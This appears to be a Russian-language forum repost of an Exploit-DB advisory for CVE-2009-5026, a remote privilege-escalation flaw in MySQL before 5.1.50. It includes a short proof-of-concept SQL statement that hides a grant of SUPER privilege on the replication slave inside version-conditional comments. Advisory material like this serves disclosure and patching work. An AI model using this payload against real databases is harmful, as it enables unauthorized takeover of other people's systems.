- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34796
- Проверка EDB
-
- Пройдено
- Автор
- LIBING SONG
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2009-5026
- Дата публикации
- 2010-08-03
Oracle MySQL < 5.1.50 - Privilege Escalation
Код:
source: https://www.securityfocus.com/bid/43677/info
MySQL is prone to a remote privilege-escalation vulnerability.
An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system.
This issue affects versions prior to MySQL 5.1.50.
UPDATE db1.tbl1 /*!514900 ,mysql.user */
SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'
WHERE mysql.user.User='user1'*/;- Источник
- www.exploit-db.com
